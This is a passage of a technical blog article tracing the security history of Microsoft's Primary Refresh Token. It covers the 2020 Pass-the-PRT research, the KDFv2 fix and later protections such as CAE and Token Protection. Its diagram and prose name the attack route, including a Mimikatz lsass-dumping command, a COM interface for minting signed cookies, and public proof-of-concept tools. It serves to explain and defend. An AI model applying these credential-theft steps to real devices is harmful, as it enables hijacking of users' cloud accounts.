The shorthand &quot;the PRT cookie is DKey-signed&quot; was already imprecise before July 2021, and it became actively wrong after the KDFv2 update. The cookie is HMAC-signed with `alg: HS256`, using a symmetric key derived from the *session key* via SP800-108 KDF, not signed with the asymmetric device key. blog.3or.de&apos;s reverse-engineering captures the post-2021 mechanic precisely: &quot;Before CVE-2021-33779, the key to sign the PRT Cookie was derived from the session key using a function that only required a client-chosen `ctx` value. Although the session key and derivation process were handled inside the TPM, the derived key was managed outside the TPM&quot; [@dimi-3or-de-kdfv2]. The asymmetric device key only signs the PRT *issuance* request; everything afterwards is HMAC over a derived key.
&lt;p&gt;If both keys live in the TPM and the cookie is signed with a key derived from a TPM-resident session key, the whole architecture &lt;em&gt;should&lt;/em&gt; make Pass-the-PRT impossible. In 2020, three independent researchers proved it didn&apos;t.&lt;/p&gt;
&lt;h2&gt;5. When TPM-binding is not enough&lt;/h2&gt;
&lt;p&gt;In July 2020, two researchers, working independently, asked the same question: if the session key is in the TPM, can I still mint a PRT cookie?&lt;/p&gt;
&lt;p&gt;The answer, on the architecture Microsoft shipped at the time, was yes -- and the answer came from three angles in less than two months.&lt;/p&gt;

A Primary Refresh Token can be compared to a long-term persistent Ticket Granting Ticket (TGT) in Active Directory... the Primary Refresh Token however can be used to authenticate to any application, and is thus even more valuable. This is why Microsoft has applied extra protection to this token. -- Dirk-jan Mollema, 21 July 2020
&lt;p&gt;&lt;strong&gt;Lee Christensen at SpecterOps, mid-July 2020.&lt;/strong&gt; Christensen&apos;s blog post -- &quot;Requesting Azure AD Refresh Tokens on Azure AD-joined Machines for Browser SSO&quot; -- documented a path through a Component Object Model interface, &lt;code&gt;IProofOfPossessionCookieInfoManager.GetCookieInfoForUri&lt;/code&gt;, that returned a fully signed &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookie to a user-mode caller [@christensen-specterops-2020]. The CLSID is &lt;code&gt;{a9927f85-a304-4390-8b23-a75f1c668600}&lt;/code&gt;; the implementation lives in &lt;code&gt;MicrosoftAccountTokenProvider.dll&lt;/code&gt;; the workflow rides through &lt;code&gt;BrowserCore.exe&lt;/code&gt; over a named pipe. Christensen released the proof-of-concept as &lt;code&gt;RequestAADRefreshToken&lt;/code&gt; on GitHub [@gh-requestaadrefreshtoken]. An attacker -- specifically, a process running as the signed-in user -- could call the COM interface, lift the cookie, and paste it into a browser running anywhere on the planet.&lt;/p&gt;
&lt;p&gt;The COM-API path did not require admin. It did not require touching the TPM. It did not need to know anything about the session key. The operating system politely produced a signed cookie because that is what the COM API was built to do, and the contract did not distinguish the legitimate browser from the attacker process.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dirk-jan Mollema, 21 July 2020.&lt;/strong&gt; A week later, Mollema published &quot;Abusing Azure AD SSO with the Primary Refresh Token&quot; on &lt;code&gt;dirkjanm.io&lt;/code&gt;. Mollema&apos;s framing was different: he wanted to understand the PRT as a forensic artifact. The blog opens with the TGT analogy quoted above and explicitly attributes parallel discovery to Christensen [@mollema-prt-2020-07]. The toolchain he documented, ROADtoken, lived inside the larger ROADtools framework that he was building for offensive Azure AD research [@gh-roadtools]. The threat model was the same as Christensen&apos;s: an attacker on the live device could mint cookies, and the TPM was not in the way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mollema, 5 August 2020.&lt;/strong&gt; This is the blog that mattered most. In &quot;Digging further into the Primary Refresh Token,&quot; Mollema reverse-engineered &lt;code&gt;aadcloudap.dll&lt;/code&gt;. He isolated the session-key handling, the cookie-construction routine, the SP800-108 derivation call, the eventual &lt;code&gt;BCryptKeyDerivation&lt;/code&gt;-then-HMAC flow. And he wrote the sentence that, in retrospect, defined the next year of Microsoft&apos;s response: &quot;despite the session key of the PRT is stored in the TPM whenever possible, this doesn&apos;t prevent us from extracting the PRT and the required information to create SSO cookies. The result of this is that regardless of whether the PRT is protected by the TPM or not, with Administrator access it is possible to extract the PRT from LSASS and use the PRT on a different device than it was issued to&quot; [@mollema-prt-2020-08].&lt;/p&gt;

despite the session key of the PRT is stored in the TPM whenever possible, this doesn&apos;t prevent us from extracting the PRT and the required information to create SSO cookies. -- Dirk-jan Mollema, 5 August 2020
&lt;p&gt;The reason is the most important thing in this article. The session key never left the TPM. But the &lt;em&gt;signing key derived from the session key&lt;/em&gt; did. The TPM dutifully performed an SP800-108 derivation -- HMAC-SHA256 with the label &lt;code&gt;AzureAD-SecureConversation&lt;/code&gt; and the client-chosen &lt;code&gt;ctx&lt;/code&gt; value -- and returned the derived key to caller memory. The TPM was protecting the root of the derivation, not the output of it. Once the derived key materialized in &lt;code&gt;lsass&lt;/code&gt;, an admin-with-debug-privilege attacker could simply read it.&lt;/p&gt;
&lt;p&gt;Around the same time, Benjamin Delpy -- the author of Mimikatz -- picked up Mollema&apos;s &quot;challenge&quot; of recovering PRT data from &lt;code&gt;lsass&lt;/code&gt;. Two days after Mollema&apos;s 5 August post, that collaboration produced the Mimikatz release tagged &lt;code&gt;2.2.0-20200807&lt;/code&gt;, which added the &lt;code&gt;sekurlsa::cloudap&lt;/code&gt; and &lt;code&gt;dpapi::cloudapkd&lt;/code&gt; modules [@gh-mimikatz]. The tag URL itself was later collapsed in GitHub&apos;s modern UI -- it returns 404 today, almost certainly because of repeated takedown requests during the Azure-PRT release period -- but a Wayback Machine snapshot from 20 September 2020 preserves the release page and proves the tag existed at the time [@wayback-mimikatz-tag].The GitHub URL &lt;code&gt;https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200807&lt;/code&gt; returns HTTP 404 in the current GitHub UI; the modern releases list starts at &lt;code&gt;2.2.0-20210729&lt;/code&gt;. The Wayback snapshot at &lt;code&gt;web.archive.org/web/20200920005113/...&lt;/code&gt; preserves the release page (including the &quot;prt3&quot; animated demonstration GIF). Nestori Syynimaa&apos;s AADInternals post and Mollema&apos;s 5 August 2020 blog both reference the same tag URL, which is how we know the artifact was real [@wayback-mimikatz-tag] [@syynimaa-aadinternals-prt] [@mollema-prt-2020-08].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Nestori Syynimaa and AADInternals, August through September 2020.&lt;/strong&gt; Syynimaa&apos;s AADInternals PowerShell module shipped &lt;code&gt;Get-AADIntUserPRTToken&lt;/code&gt; as part of v0.4.1 alongside the disclosure. On 29 September 2020, AADInternals&apos; blog post about the tool gained an inline update: &quot;It seems that PRT tokens must now include the &lt;code&gt;request_nonce&lt;/code&gt;. If not, Azure AD sends a redirect with &lt;code&gt;sso_nonce&lt;/code&gt; which must be added to the PRT token. This means that without access to session key, PRT tokens can&apos;t be used anymore&quot; [@syynimaa-aadinternals-prt]. That update is the first observable Microsoft mitigation: Entra ID began demanding that PRT cookies contain a server-issued nonce. It bought time. It did not solve the architectural problem.&lt;/p&gt;

sequenceDiagram
    participant Attacker
    participant LSASS
    participant TPM
    participant COM as IProofOfPossessionCookieInfoManager
    participant Entra as Microsoft Entra ID
    Note over Attacker,LSASS: Attacker has user or admin on the live device
    Attacker-&amp;gt;&amp;gt;LSASS: sekurlsa::cloudap (admin path)
    LSASS--&amp;gt;&amp;gt;Attacker: PRT + derived signing key + context
    Note over Attacker: Or, parallel user-only path:
    Attacker-&amp;gt;&amp;gt;COM: GetCookieInfoForUri(target_url)
    COM--&amp;gt;&amp;gt;Attacker: Pre-baked x-ms-RefreshTokenCredential
    Note over Attacker: Cookie is now portable
    Attacker-&amp;gt;&amp;gt;Entra: Replay cookie from an attacker-controlled host
    Entra--&amp;gt;&amp;gt;Attacker: SSO honored, access token issued
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; With admin on an Entra-joined device in summer 2020, an attacker could lift the PRT and the derived signing key from &lt;code&gt;lsass&lt;/code&gt;, mint fresh &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookies on any host they controlled, and pass Conditional Access checks that included the cloned &lt;code&gt;DeviceId&lt;/code&gt; claim. Even without admin, the COM-API path returned signed cookies to a user-context process. The TPM was busy doing exactly what its contract said, and that contract was insufficient.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The community quickly settled on a name for this class: &lt;strong&gt;Pass-the-PRT&lt;/strong&gt;. By analogy to Pass-the-Hash and Pass-the-Ticket, the attack is &quot;lift a long-lived authentication artifact from one host, present it as your own elsewhere.&quot; For a credential that the entire cloud sign-in stack was about to trust, the implications were severe.&lt;/p&gt;
&lt;p&gt;By September 2020 Microsoft had bolted a nonce onto the cookie. By July 2021 they had something architecturally different: a single SHA-256 over the cookie&apos;s full payload that killed off-device Pass-the-PRT for good.&lt;/p&gt;
&lt;h2&gt;6. KDFv2 and the death of off-device Pass-the-PRT&lt;/h2&gt;
&lt;p&gt;The fix Microsoft shipped on 13 July 2021 fits on one line.&lt;/p&gt;
&lt;p&gt;The CVE is &lt;strong&gt;CVE-2021-33779&lt;/strong&gt;. NIST&apos;s National Vulnerability Database describes it as &quot;Windows AD FS Security Feature Bypass Vulnerability&quot; and provides no further public detail [@nvd-cve-2021-33779]. Microsoft&apos;s own KDFv2 documentation ties the patch explicitly to that CVE: &quot;On July 13, 2021, updates were released for AD FS to address token replay attacks, as described in CVE-2021-33779. These updates introduce new settings to enable and control a new, Key Derivation Function (KDF) called KDFv2&quot; [@kdfv2-learn].&lt;/p&gt;

The version-2 key-derivation rule introduced for the `x-ms-RefreshTokenCredential` cookie on 13 July 2021. Under KDFv2, the SP800-108 KDF context is `SHA256(ctx || assertion_payload)` rather than the bare client-chosen `ctx` value. The JWT header field `kdf_ver` carries the value `2` to indicate that KDFv2 was used. KDFv1 is preserved for backward compatibility but is disabled by default on a service that has been moved to &quot;Enforced&quot; mode [@ms-oapxbc-jwt] [@kdfv2-learn].
&lt;p&gt;A small subtlety lives in the attribution. NVD names AD FS. The community-side coverage -- blog.3or.de, Mollema&apos;s TROOPERS 22 deck, AADInternals -- names PRT-cookie forgery. The Microsoft KDFv2 page sits in the middle: it ties the patch to CVE-2021-33779 and walks through the same derivation change that closed off-device Pass-the-PRT, but it does not use the term &quot;Pass-the-PRT&quot; on the page itself. We will keep the hedge in mind.&lt;/p&gt;

NVD&apos;s one-line description -- &quot;Windows AD FS Security Feature Bypass Vulnerability&quot; -- is authoritative for the federal CVE record [@nvd-cve-2021-33779]. The community attribution to the Pass-the-PRT class comes from independent reverse-engineering: blog.3or.de&apos;s analysis is the most precise public reading. Both can be true; KDFv2 is the rollout vehicle, and it ships into both AD FS (the on-prem federation server) and the Microsoft Entra ID PRT path. The article reads CVE-2021-33779 as &quot;the rollout vehicle for KDFv2,&quot; not as a one-to-one CVE-to-attack mapping.
&lt;p&gt;The load-bearing rule is one sentence. MS-OAPXBC §3.2.5 puts it like this: &quot;If the client chooses to use KDFv2, the client MUST use &lt;code&gt;SHA256(ctx || assertion payload)&lt;/code&gt; instead of &lt;code&gt;ctx&lt;/code&gt; as the context for deriving the signing key. The client MUST also add the JWT header field &lt;code&gt;kdf_ver&lt;/code&gt; with value set to 2 to communicate that KDFv2 was used for creating the derived signing key&quot; [@ms-oapxbc-jwt].&lt;/p&gt;
&lt;p&gt;To see why that line matters, picture what the attacker in §5 was actually copying. The attacker lifted the derived signing key out of &lt;code&gt;lsass&lt;/code&gt;. The derived signing key was, under KDFv1, a function of the session key (TPM-resident) and the client-chosen context &lt;code&gt;ctx&lt;/code&gt; (any 256 bits the attacker liked). Any cookie the attacker built using the same &lt;code&gt;ctx&lt;/code&gt; would verify against the same derived key. The attacker could pick &lt;code&gt;ctx&lt;/code&gt; first, derive the key once, and stamp out as many cookies as they wanted.&lt;/p&gt;
&lt;p&gt;Under KDFv2, the context is no longer arbitrary. The context is &lt;code&gt;SHA256(ctx || assertion_payload)&lt;/code&gt;. The &lt;code&gt;assertion_payload&lt;/code&gt; is the JWT body the cookie is trying to assert. Change a single claim in the body, and the SHA-256 hash changes, and the SP800-108 derivation produces a different key. A key derived for one cookie cannot sign any other cookie. There is nothing to precompute.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The architectural insight is the same one Kerberos learned with PA-FX-FAST and TLS learned with channel binding: a session-key derivation must be bound to the message being signed, not just to a per-session label. Before KDFv2, the derivation contract was &quot;derive a key for this session, then sign anything.&quot; After KDFv2, the contract is &quot;derive a key for this specific message.&quot; An attacker who exfiltrates the session key off-device cannot precompute a useful signing key; an attacker who exfiltrates a derived signing key for one cookie cannot reuse it for the next. Off-device Pass-the-PRT is dead.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The residual is also explicit. The attacker who is still &lt;em&gt;on the device&lt;/em&gt; -- still has a process running as the user or as &lt;code&gt;SYSTEM&lt;/code&gt; -- can ask CloudAP to mint a fresh cookie. The TPM happily performs the new SHA-256-bound derivation, because that is its job; CloudAP returns the signed cookie to the calling process, because that is its job. The blog.3or.de reverse-engineering names this class precisely: &quot;This attack, referred to as Pass-the-PRT-Cookie, still works today but requires presence on the targeted device&quot; [@dimi-3or-de-kdfv2]. Mollema&apos;s TROOPERS 22 talk calls the same residual &quot;Cookie-on-Demand&quot; and walks the in-place cookie-minting flow on a fully patched Entra-joined endpoint [@troopers22-mollema-pdf] [@troopers22-abstract].&lt;/p&gt;
&lt;p&gt;The minimal cryptographic statement of the fix is small enough to write down. Let $H$ be HMAC-SHA256, $k_s$ be the session key, $\ell$ be the constant label &lt;code&gt;AzureAD-SecureConversation&lt;/code&gt;, $\mathit{ctx}$ be the per-cookie context, and $p$ be the JWT body to be signed. Under KDFv1, the derived signing key was $k_d = H(k_s, \ell \parallel \mathit{ctx})$. Under KDFv2, the derived signing key is $k_d = H(k_s, \ell \parallel \mathrm{SHA256}(\mathit{ctx} \parallel p))$. The difference is exactly the hash of the message body inside the derivation context.&lt;/p&gt;
&lt;p&gt;{`
// Illustrative; do NOT use as production crypto.
const crypto = require(&apos;crypto&apos;);&lt;/p&gt;
&lt;p&gt;function sha256(buf) { return crypto.createHash(&apos;sha256&apos;).update(buf).digest(); }
function hmac(key, data) { return crypto.createHmac(&apos;sha256&apos;, key).update(data).digest(); }&lt;/p&gt;
&lt;p&gt;function deriveKdfv2SigningKey(sessionKey, ctx, assertionPayload) {
  const label = Buffer.from(&apos;AzureAD-SecureConversation&apos;, &apos;utf8&apos;);
  const boundCtx = sha256(Buffer.concat([ctx, assertionPayload]));
  // SP800-108 KDF in counter mode is more involved; one HMAC stands in here.
  return hmac(sessionKey, Buffer.concat([label, boundCtx]));
}&lt;/p&gt;
&lt;p&gt;// The signing key is now uniquely tied to assertionPayload.
`}&lt;/p&gt;
&lt;p&gt;A side-by-side flowchart makes the structural shift legible.&lt;/p&gt;

flowchart LR
    subgraph KDFv1 [&quot;KDFv1 (pre-July 2021)&quot;]
        A1[Session key in TPM] --&amp;gt; A2[&quot;SP800-108 KDF&lt;br /&gt;label = AzureAD-SecureConversation&lt;br /&gt;context = ctx&quot;]
        A2 --&amp;gt; A3[Derived signing key]
        A3 --&amp;gt; A4[HMAC over any JWT body]
    end
    subgraph KDFv2 [&quot;KDFv2 (July 2021+)&quot;]
        B1[Session key in TPM] --&amp;gt; B2[&quot;SP800-108 KDF&lt;br /&gt;label = AzureAD-SecureConversation&lt;br /&gt;context = SHA256 of ctx || payload&quot;]
        B2 --&amp;gt; B3[Derived signing key]
        B3 --&amp;gt; B4[HMAC over the specific JWT body]
    end
&lt;p&gt;KDFv2 killed off-device replay. It did not kill the on-device signing oracle, and it did not shorten the PRT&apos;s 90-day lifetime. The next generation tackled both -- not by closing the on-device gap, which is architecturally hard, but by making issued access tokens revocable in seconds.&lt;/p&gt;
&lt;h2&gt;7. The seam: CAE, Token Protection, Cloud Kerberos Trust&lt;/h2&gt;
&lt;p&gt;By 2022 the PRT was &lt;em&gt;the&lt;/em&gt; credential. The work that remained was to make every artifact issued &lt;em&gt;from&lt;/em&gt; it -- every access token, every Kerberos TGT, every Conditional Access claim -- share the same device-binding contract.&lt;/p&gt;
&lt;p&gt;That work has three named pieces, and a quiet rename in the middle.&lt;/p&gt;
&lt;h3&gt;Continuous Access Evaluation&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Continuous Access Evaluation&lt;/strong&gt; entered public preview in late 2020, a few months after Mollema&apos;s August blog. By 10 January 2022, Microsoft announced General Availability across Microsoft Entra ID; the announcement post came from Alex Simons, Corporate Vice President for Program Management in the Microsoft Identity Division [@twu-cae-ga-mirror]. CAE is the mechanism by which a &lt;em&gt;long-lived&lt;/em&gt; access token issued from a PRT can be invalidated in seconds when something critical changes.&lt;/p&gt;

An industry-standard near-real-time revocation channel for OAuth access tokens, implemented by Microsoft Entra ID as a claim-challenge protocol between Entra and CAE-aware resource providers. CAE is anchored in the OpenID Continuous Access Evaluation Profile (CAEP) [@caep-openid-spec]. CAE-aware resources reject a previously valid access token when Entra signals one of five critical events: user account deletion or disablement, password change, MFA enablement, admin token revocation, or high user-risk classification. Microsoft Learn documents an event-propagation upper bound of 15 minutes, with IP-location enforcement instantaneous [@cae-learn].
&lt;p&gt;Mechanically: a CAE-aware client requests an access token from Entra ID, and Entra issues a &lt;em&gt;long-lived&lt;/em&gt; token -- up to 28 hours rather than the conventional one hour -- with a &lt;code&gt;xms_cc&lt;/code&gt; claim signaling that the bearer understands the protocol. The resource provider serves requests against that token. When something changes -- the user gets disabled in HR, the IT admin resets the password, a sign-in trips a high-risk classification -- Entra ID fires a CAEP event. The resource provider receives the event and, on the next request, returns an HTTP 401 with a &lt;code&gt;WWW-Authenticate&lt;/code&gt; claim challenge. The client returns to Entra, presents the PRT, and asks for a fresh access token; Entra evaluates Conditional Access at that moment and either issues a new token or refuses. The user sees, at worst, a fast re-authentication; the access window for the revoked credential is on the order of seconds rather than the access token&apos;s original lifetime.&lt;/p&gt;

sequenceDiagram
    participant Admin
    participant Entra as Microsoft Entra ID
    participant Resource as Exchange Online
    participant Client
    Admin-&amp;gt;&amp;gt;Entra: Force password reset for user
    Entra--&amp;gt;&amp;gt;Resource: CAEP event: Credential Change
    Client-&amp;gt;&amp;gt;Resource: GET /mail (with long-lived token)
    Resource--&amp;gt;&amp;gt;Client: 401 WWW-Authenticate (claim challenge)
    Client-&amp;gt;&amp;gt;Entra: Refresh token + claim challenge
    Note over Entra: Re-evaluate Conditional Access against current user state
    Entra--&amp;gt;&amp;gt;Client: New short access token (or deny)
    Client-&amp;gt;&amp;gt;Resource: GET /mail (new token)
    Resource--&amp;gt;&amp;gt;Client: 200 OK
&lt;p&gt;The initial CAE deployment was constrained: only Exchange Online, SharePoint Online, and Teams understood the claim-challenge protocol at GA [@cae-learn]. Microsoft Graph followed. Other workloads still honor an access token until natural expiry, which is the open scope of the §9 caveat list.&lt;/p&gt;
&lt;h3&gt;Token Protection&lt;/h3&gt;
&lt;p&gt;If CAE is the &lt;em&gt;time&lt;/em&gt; dimension, &lt;strong&gt;Token Protection&lt;/strong&gt; is the &lt;em&gt;space&lt;/em&gt; dimension. The Conditional Access feature, also referred to as &quot;token binding,&quot; demands that an app-token request originate from a device-bound session token -- in practice, a PRT-signed assertion. The Microsoft Learn page defines it as a &quot;Conditional Access session control that attempts to reduce token replay attacks by ensuring only device bound sign-in session tokens, like Primary Refresh Tokens (PRTs), are accepted by Microsoft Entra ID when applications request access to protected resources&quot; [@token-protection-learn].&lt;/p&gt;

A Microsoft Entra Conditional Access session control that enforces device-bound sign-in for app-token requests against supported resources. Token Protection is the per-app analogue of the PRT&apos;s device-binding contract: every access token must originate from a device-bound session token. As of 2026, Token Protection is generally available on Windows for Exchange Online, SharePoint Online, Teams, Azure Virtual Desktop, and Windows 365; it is in preview on iOS/iPadOS and macOS via the Microsoft Enterprise SSO plug-in [@token-protection-learn] [@apple-sso-plugin-learn].
&lt;p&gt;The current scope is intentionally narrow. Native applications and the Microsoft Enterprise SSO plug-in for Apple devices both implement the device-bound assertion. Browsers do not. A browser visiting a Microsoft cloud resource still rides the &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookie path. Closing that gap is what Device Bound Session Credentials -- the cross-vendor web standard Microsoft co-designed with Google -- exists to do, and we will return to that in §10.&lt;/p&gt;
&lt;h3&gt;Cloud Kerberos Trust&lt;/h3&gt;
&lt;p&gt;The third piece bridges the cloud-mediated PRT path back to on-prem Kerberos. The mechanism is simple in framing and intricate in implementation: Microsoft Entra ID provisions a virtual &lt;code&gt;AzureADKerberos&lt;/code&gt; read-only domain controller object inside the on-prem Active Directory domain, and an Entra-signed partial Kerberos TGT issued to a Hello-for-Business-signed-in device can be exchanged at any on-prem DC for a fully-formed TGT carrying SID and authorization data.&lt;/p&gt;

A Microsoft Entra ID mechanism by which Entra ID can mint Kerberos TGTs for one or more Active Directory domains. An Entra-signed partial TGT carries the user&apos;s identity; an on-prem domain controller, holding the cryptographic shared key represented by the virtual `AzureADKerberos` RODC computer object, completes the TGT with on-prem SID and group claims. The bridge requires Windows 10 21H2 (with KB5010415+) or later, and a Windows Server 2016+ functional level on the domain controller; it shipped in April-June 2022 [@cloud-kerberos-trust-learn] [@entra-passwordless-onprem].
&lt;p&gt;The Microsoft Learn deployment guide is explicit about the AzureADKerberos object&apos;s role: &quot;When Microsoft Entra Kerberos is enabled in an Active Directory domain, an AzureADKerberos computer object is created in the domain. This object: Appears as a read only domain controller (RODC) object, but isn&apos;t associated with any physical servers; Is only used by Microsoft Entra ID to generate TGTs for the Active Directory domain&quot; [@cloud-kerberos-trust-learn]. The architectural property to notice is that the user&apos;s NTLM hash is &lt;em&gt;not&lt;/em&gt; the binding key. Microsoft Entra ID never holds the on-prem NTLM hash; the cryptographic root is the AzureADKerberos RODC&apos;s keys, which Entra and the on-prem domain controller share without involving any user-side long-term secret.&lt;/p&gt;
&lt;p&gt;Cloud Kerberos Trust is the Kerberos PKINIT pattern from RFC 4556 [@rfc-4556-pkinit], reframed: the cloud identity provider is the public-key initial authenticator, and Entra ID issues the partial TGT exactly as a PKINIT-aware KDC would.&lt;/p&gt;
&lt;h3&gt;The Azure AD to Microsoft Entra ID rename&lt;/h3&gt;
&lt;p&gt;In the middle of all this, on 11 July 2023, the brand changed. Microsoft renamed Azure Active Directory to Microsoft Entra ID and consolidated several adjacent products under the Microsoft Entra umbrella [@entra-rename-2023]. The article uses &quot;Microsoft Entra ID&quot; throughout; in primary sources from before July 2023, the same product is &quot;Azure AD.&quot; The rename is real, and it matters when citing older documentation, but it does not change the protocol surface.&lt;/p&gt;
&lt;h3&gt;The seam restated&lt;/h3&gt;
&lt;p&gt;With Continuous Access Evaluation, Token Protection, and Cloud Kerberos Trust in place, the picture from §1 fills out. Every cloud-mediated identity feature on a modern Windows endpoint either issues, refreshes, presents, or evaluates a PRT. The PRT itself is the asymmetric handshake that binds the device. CAE makes the time dimension elastic. Token Protection makes the access surface device-bound at the resource-request layer. Cloud Kerberos Trust makes the on-prem Kerberos surface reachable from a PRT-bearing device.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The PRT is the cryptographic seam: a single device-bound credential, issued at first sign-in, that every other identity artifact on the device references. CAE, Token Protection, and Cloud Kerberos Trust are not three different bindings; they are three different ways the same PRT contract reaches three different surfaces -- the revocation surface, the per-resource access-token surface, and the on-prem Kerberos surface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A small comparison matrix makes the support story explicit.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource / scenario&lt;/th&gt;
&lt;th&gt;CAE-aware&lt;/th&gt;
&lt;th&gt;Token Protection (Windows GA)&lt;/th&gt;
&lt;th&gt;Cloud Kerberos Trust&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Exchange Online&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SharePoint Online&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Teams&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Graph&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Not enforced&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure Virtual Desktop&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 365&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On-prem file share&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Browser (any Microsoft cloud)&lt;/td&gt;
&lt;td&gt;Indirect via resource&lt;/td&gt;
&lt;td&gt;No (native apps only)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;That is what the PRT does. But four sibling articles in this series describe identity surfaces the PRT does &lt;em&gt;not&lt;/em&gt; cover. Before we celebrate the seam, we have to be honest about where it stops.&lt;/p&gt;
&lt;h2&gt;8. Where PRT is not the answer&lt;/h2&gt;
&lt;p&gt;The PRT carries device state, MFA state, and Conditional Access claims for the &lt;em&gt;cloud-mediated&lt;/em&gt; identity path. There is no clause in that sentence that mentions on-prem Kerberos, NTLM hashes, local admin authorization, or workload identities -- and that is the point.&lt;/p&gt;
&lt;p&gt;Five surfaces the PRT does not cover, in the order operators most often confuse them:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;On-prem Kerberos via the on-prem KDC.&lt;/strong&gt; A Windows user signing into a domain-joined or hybrid-joined machine still mints a Kerberos TGT against the on-prem Key Distribution Center on Windows logon. The PRT path is parallel, not replacement. The user&apos;s downstream &lt;code&gt;kerberos.dll&lt;/code&gt; ticket cache is populated by Kerberos AS_REQ/AS_REP exchanges between the workstation and the on-prem DC; the PRT lives in CloudAP&apos;s memory in &lt;code&gt;lsass&lt;/code&gt; and does not influence that flow. Cloud Kerberos Trust adds a bridge from PRT to on-prem TGT for users whose primary credential is in Entra; it does not retire the on-prem Kerberos path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Credential Guard and LSAISO.&lt;/strong&gt; &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt;, introduced on the Enterprise SKU of the original Windows 10 release in 2015, isolates NTLM hashes and Kerberos long-term keys inside the Local Security Authority Isolated Subsystem (LSAISO), which runs in Virtual Trust Level 1 (VTL1) on top of the Hyper-V hypervisor [@credential-guard-learn] [@credential-guard-itpro-2016-wayback]. Credential Guard predates the cloud-identity model entirely; its threat model is &lt;em&gt;on-prem credential theft via long-term-key extraction from &lt;code&gt;lsass&lt;/code&gt;.&lt;/em&gt; The load-bearing distinction for the threat model is this: &lt;strong&gt;PRT material does NOT live in LSAISO&lt;/strong&gt;. It lives in normal &lt;code&gt;lsass.exe&lt;/code&gt; under CloudAP. Mollema&apos;s August 2020 extraction worked because the PRT&apos;s session-key handling is in the same address space as ordinary user processes that hold debug privilege; LSAISO did not move there. Treat &quot;I have Credential Guard enabled&quot; and &quot;my PRT is hardware-isolated&quot; as independent statements.The LSAISO isolation contract is for on-prem credentials -- NTLM hashes, Kerberos &lt;code&gt;krbtgt&lt;/code&gt; keys, the kinds of long-term secrets that the 2010s-era &quot;Pass-the-Hash&quot; tooling was designed to extract. The PRT&apos;s session key is a per-PRT artifact that lives in CloudAP&apos;s memory under normal LSASS. Credential Guard protects you against a different attack class. Get it for those reasons; do not get it expecting PRT-class mitigation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adminless and local-admin removal.&lt;/strong&gt; &quot;&lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Adminless&lt;/a&gt;&quot; is an authorization pattern -- removing standing local-admin rights, requiring just-in-time elevation -- not an authentication pattern. It is orthogonal to the PRT. A device can be PRT-bound and still have a thousand local admins; a device can have zero local admins and still mint PRTs. The PRT addresses &quot;who is signing in;&quot; Adminless addresses &quot;what they can do once signed in.&quot; Conflating them is a common rhetorical move in Microsoft documentation and a common source of confusion in audits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;App Identity&lt;/a&gt;, managed identities, and workload identities.&lt;/strong&gt; Workloads in Microsoft cloud environments authenticate through a separate broker path: the Azure Instance Metadata Service (IMDS) on VMs, Workload Identity Federation for cross-cloud Kubernetes flows, managed identities on Functions and App Service. None of these always involve a PRT. A managed identity is a non-human principal in Entra ID with a system-issued credential, not a device-bound JWT, and the broker path that produces its access tokens is structurally different. The App Identity sibling article addresses that surface in detail.&lt;/p&gt;
